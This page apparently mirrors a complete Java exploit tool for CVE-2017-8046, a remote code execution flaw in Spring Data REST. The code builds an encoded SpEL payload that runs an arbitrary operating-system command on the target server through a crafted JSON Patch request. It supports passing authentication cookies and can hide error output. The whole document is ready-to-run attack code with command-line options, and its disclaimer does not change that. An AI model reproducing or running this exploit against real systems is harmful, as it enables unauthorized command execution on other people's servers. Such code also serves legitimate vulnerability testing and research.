扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 |
// Exploit Title: RCE in PATCH requests in Spring Data REST // Date: 2018-03-10 // Exploit Author: Antonio Francesco Sardella // Vendor Homepage: https://pivotal.io/ // Software Link: https://projects.spring.io/spring-data-rest/ // Version: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), 3.0.1 (Kay SR1) // Tested on: 'Microsoft Windows 7' and 'Xubuntu 17.10.1' with 'spring-boot-starter-data-rest' version '1.5.6.RELEASE' // CVE: CVE-2017-8046 // Category: Webapps // Repository: https://github.com/m3ssap0/spring-break_cve-2017-8046 // Example Vulnerable Application: https://github.com/m3ssap0/SpringBreakVulnerableApp // Vulnerability discovered and reported by: Man Yue Mo from Semmle and lgtm.com package com.afs.exploit.spring; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.net.URI; import java.net.URISyntaxException; import org.apache.http.HttpResponse; import org.apache.http.client.HttpClient; import org.apache.http.client.methods.HttpPatch; import org.apache.http.entity.StringEntity; import org.apache.http.impl.client.HttpClientBuilder; /** * This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046). * This software is written to have as less external dependencies as possible. * DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please * use this tool responsibly. I do not take responsibility for the way in which any one uses this application. * I am NOT responsible for any damages caused or any crimes committed by using this tool. * .................. * . CVE-ID ........: CVE-2017-8046 * . Link ..........: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 * . Description ...: Malicious PATCH requests submitted to spring-data-rest servers in Pivotal Spring Data REST * .................. versions prior to 2.5.12, 2.6.7, 3.0 RC3, Spring Boot versions prior to 2.0.0M4, and Spring * .................. Data release trains prior to Kay-RC3 can use specially crafted JSON data to run arbitrary * .................. Java code. * .................. * * @author Antonio Francesco Sardella */ public class SpringBreakCve20178046 { /** * Version string. */ private static final String VERSION = "v1.0 (2018-03-10)"; /** * The JSON Patch object. */ private static String JSON_PATCH_OBJECT = "[{ \"op\" : \"replace\", \"path\" : \"%s\", \"value\" : \"pwned\" }]"; /** * This is a way to bypass the split and 'replace' * logic performed by the framework on slashes. */ private static String SLASH = "T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))"; /** * Used to encode chars. */ private static String CHAR_ENCODING = "T(java.lang.Character).toChars(%d)[0]"; /** * Malicious payload. */ private static String PAYLOAD; /** * Malicious payload initialization. */ static { PAYLOAD = "T(org.springframework.util.StreamUtils).copy("; PAYLOAD += "T(java.lang.Runtime).getRuntime().exec("; PAYLOAD += "("; PAYLOAD += "T(java.lang.System).getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"win\\\")"; PAYLOAD += "?"; PAYLOAD += "\\\"cmd \\\"+" + SLASH + "+\\\"c \\\""; PAYLOAD += ":"; PAYLOAD += "\\\"\\\""; PAYLOAD += ")+"; PAYLOAD += "%s"; // The encoded command will be placed here. PAYLOAD += ").getInputStream()"; PAYLOAD += ","; PAYLOAD += "T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes()"; PAYLOAD += ".getResponse().getOutputStream()"; PAYLOAD += ").x"; } /** * Error cause string that can be used to "clean the response." */ private static String ERROR_CAUSE = "{\"cause"; /** * The target URL. */ private URI url; /** * The command that will be executed on the remote machine. */ private String command; /** * Cookies that will be passed. */ private String cookies; /** * Flag used to remove error messages in output due to * the usage of the exploit. It could hide error messages * if the request fails for other reasons. */ private boolean cleanResponse; /** * Verbosity flag. */ private boolean verbose; /** * Default constructor. */ public SpringBreakCve20178046() { this.verbose = false; this.cleanResponse = false; } /** * Performs the exploit. * * @throws IOException * If something bad occurs during HTTP GET. */ public void exploit() throws IOException { checkInput(); printInput(); String payload = preparePayload(); String response = httpPatch(payload); printOutput(response); } /** * Checks the input. */ private void checkInput() { if (this.url == null) { throw new IllegalArgumentException("URL must be passed."); } if (isEmpty(this.command)) { throw new IllegalArgumentException("Command must be passed."); } } /** * Prints input if verbose flag is true. */ private void printInput() { if (isVerbose()) { System.out.println("[*] Target URL ........: " + this.url); System.out.println("[*] Command ...........: " + this.command); System.out.println("[*] Cookies ...........: " + (isEmpty(this.cookies) ? "(no cookies)" : this.cookies)); } } /** * Prepares the payload. * * @return The malicious payload that will be injected. */ private String preparePayload() { System.out.println("[*] Preparing payload."); String command = encodingCommand(); // Encoding inserted command. String payload = String.format(PAYLOAD, command); // Preparing Java payload. payload = String.format(JSON_PATCH_OBJECT, payload); // Placing payload into JSON Patch object. if (isVerbose()) { System.out.println("[*] Payload ...........: " + payload); } return payload; } /** * Encodes the inserted command. * PROS: No problems in interpreting things. * CONS: Payload too long. * * @return The encoded command. */ private String encodingCommand() { StringBuffer encodedCommand = new StringBuffer("T(java.lang.String).valueOf(new char[]{"); int commandLength = this.command.length(); for (int i = 0; i < commandLength; i++) { encodedCommand.append(String.format(CHAR_ENCODING, (int) this.command.charAt(i))); if (i + 1 < commandLength) { encodedCommand.append(","); } } encodedCommand.append("})"); if (isVerbose()) { System.out.println("[*] Encoded command ...: " + encodedCommand.toString()); } return encodedCommand.toString(); } /** * HTTP PATCH operation on the target passing the malicious payload. * * @param payload *The malicious payload. * @return The response as a string. * @throws IOException * If something bad occurs during HTTP GET. */ private String httpPatch(String payload) throws IOException { System.out.println("[*] Sending payload."); // Preparing PATCH operation. HttpClient client = HttpClientBuilder.create().build(); HttpPatch patch = new HttpPatch(this.url); patch.setHeader("User-Agent", "Mozilla/5.0"); patch.setHeader("Accept-Language", "en-US,en;q=0.5"); patch.setHeader("Content-Type", "application/json-patch+json"); // This is a JSON Patch. if (!isEmpty(this.cookies)) { patch.setHeader("Cookie", this.cookies); } patch.setEntity(new StringEntity(payload)); // Response string. StringBuffer response = new StringBuffer(); // Executing PATCH operation. HttpResponse httpResponse = client.execute(patch); if (httpResponse != null) { // Reading response code. if (httpResponse.getStatusLine() != null) { int responseCode = httpResponse.getStatusLine().getStatusCode(); System.out.println("[*] HTTP " + responseCode); } else { System.out.println("[!] HTTP response code can't be read."); } // Reading response content. if (httpResponse.getEntity() != null && httpResponse.getEntity().getContent() != null) { BufferedReader in = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent())); String inputLine; while ((inputLine = in.readLine()) != null) { response.append(inputLine); response.append(System.getProperty("line.separator")); } in.close(); } else { System.out.println("[!] HTTP response content can't be read."); } } else { System.out.println("[!] HTTP response is null."); } return response.toString(); } /** * Prints output. * * @param response *Response that will be printed. */ private void printOutput(String response) { if (!isEmpty(response)) { System.out.println("[*] vvv Response vvv"); // Cleaning response (if possible). if (isCleanResponse() && response.contains(ERROR_CAUSE)) { String cleanedResponse = response.split("\\" + ERROR_CAUSE)[0]; System.out.println(cleanedResponse); } else { System.out.println(response); } System.out.println("[*] ^^^ ======== ^^^"); } } /** * Checks if an input string is null/empty or not. * * @param input *The input string to check. * @return True if the string is null or empty, false otherwise. */ private boolean isEmpty(String input) { boolean isEmpty; if (input == null || input.trim().length() < 1) { isEmpty = true; } else { isEmpty = false; } return isEmpty; } /* Getters and setters. */ public boolean isVerbose() { return verbose; } public void setVerbose(boolean verbose) { this.verbose = verbose; } public void setUrl(String url) throws URISyntaxException { if (isEmpty(url)) { throw new IllegalArgumentException("URL must be not null and not empty."); } this.url = new URI(url.trim()); } public void setCommand(String command) { if (isEmpty(command)) { throw new IllegalArgumentException("Command must be not null and not empty."); } this.command = command.trim(); } public void setCookies(String cookies) { if (cookies != null) { cookies = cookies.trim(); } this.cookies = cookies; } public boolean isCleanResponse() { return cleanResponse; } public void setCleanResponse(boolean cleanResponse) { this.cleanResponse = cleanResponse; } /** * Shows the program help. */ public static final void help() { System.out.println("Usage:"); System.out.println(" java -jar spring-break_cve-2017-8046.jar [options]"); System.out.println("Description:"); System.out.println(" Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046)."); System.out.println("Options:"); System.out.println(" -h, --help"); System.out.println("Prints this help and exits."); System.out.println(" -u, --url [target_URL]"); System.out.println("The target URL where the exploit will be performed."); System.out.println("You have to choose an existent resource."); System.out.println(" -cmd, --command [command_to_execute]"); System.out.println("The command that will be executed on the remote machine."); System.out.println(" --cookies [cookies]"); System.out.println("Optional. Cookies passed into the request, e.g. authentication cookies."); System.out.println(" --clean"); System.out.println("Optional. Removes error messages in output due to the usage of the"); System.out.println("exploit. It could hide error messages if the request fails for other reasons."); System.out.println(" -v, --verbose"); System.out.println("Optional. Increase verbosity."); } /** * Main method. * * @param args *Input arguments */ public static void main(String[] args) { try { System.out.println("'Spring Break' RCE (CVE-2017-8046) - " + VERSION); SpringBreakCve20178046 o = new SpringBreakCve20178046(); if (args.length > 0) { for (int i = 0; i < args.length; i++) { String p = args[i]; if (("-h".equals(p) || "--help".equals(p)) && i == 0) { SpringBreakCve20178046.help(); return; } else if ("-u".equals(p) || "--url".equals(p)) { if (i + 1 > args.length - 1) { throw new IllegalArgumentException("URL must be passed."); } o.setUrl(args[++i]); } else if ("-cmd".equals(p) || "--command".equals(p)) { if (i + 1 > args.length - 1) { throw new IllegalArgumentException("Command must be passed."); } o.setCommand(args[++i]); } else if ("--cookies".equals(p)) { if (i + 1 > args.length - 1) { throw new IllegalArgumentException("Cookies must be passed, if specified."); } o.setCookies(args[++i]); } else if ("--clean".equals(p)) { o.setCleanResponse(true); } else if ("-v".equals(p) || "--verbose".equals(p)) { o.setVerbose(true); } } // Performing the exploit. o.exploit(); } else { // Wrong number of arguments. SpringBreakCve20178046.help(); return; } } catch (URISyntaxException use) { System.out.println("[!] Input error (URI syntax exception): " + use.getMessage()); } catch (IllegalArgumentException iae) { System.out.println("[!] Input error (illegal argument): " + iae.getMessage()); } catch (Exception e) { System.out.println("[!] Unexpected exception: " + e.getMessage()); e.printStackTrace(); } } } |
体验盒子
